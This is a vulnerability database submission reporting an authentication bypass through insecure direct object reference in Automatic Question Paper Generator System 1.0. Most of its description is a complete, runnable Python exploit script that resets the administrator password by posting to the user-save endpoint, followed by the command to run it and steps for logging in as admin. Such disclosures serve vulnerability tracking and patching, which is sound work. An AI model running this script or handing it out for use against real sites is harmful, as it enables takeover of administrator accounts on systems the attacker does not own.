Soumettre #31977: Automatic Question Paper Generator System 1.0 - Authentication Bypass
| Titre | Automatic Question Paper Generator System 1.0 - Authentication Bypass |
|---|---|
| Description | The Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password by insecure direct object reference (IDOR) attack, for this reason, the attacker can have full access to the administrator account by resetting your password. * Steps to Reproduce: 1. Create a python file and paste this code and save: ####################################################### import requests import random import string from requests_toolbelt import MultipartEncoder from time import sleep import argparse def banner(): print(''' ___ ____ ____ ______ / | / __ \ / __ \/ ____/ / /| |/ / / / / /_/ / / __ / ___ / /_/ / / ____/ /_/ / /_/ |_\___\_\/_/ \____/ [Automatic Question Paper Generator v1.0] [Authentication Bypass] ''') def main(): fields = { 'id': "1", 'firstname': 'Adminstrator', 'lastname': 'Admin', 'username': 'admin', 'password': arguments.newpassword } boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16)) m = MultipartEncoder(fields=fields, boundary=boundary) headers = { "Connection": "keep-alive", "Content-Type": m.content_type } r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m) if '1' in r.text: print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}') else: print('[-] Not vulnerable') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True) parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True) arguments = parser.parse_args() banner() sleep(2) main() ####################################################### 2. Run the command: python3 exploit.py -u http://target.com/aqpg/ -p newpassword 3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and login using the admin:newpassword credentials. You will be logged into the administrator account. |
| La source | ⚠️ https:/ |
| Utilisateur | mrempy (UID 24379) |
| Soumission | 05/03/2022 18:13 (il y a 4 ans) |
| Modérer | 13/03/2022 12:12 (8 days later) |
| Statut | Accepté |
| Entrée VulDB | 194839 [Automatic Question Paper Generator 1.0 élévation de privilèges] |
| Points | 20 |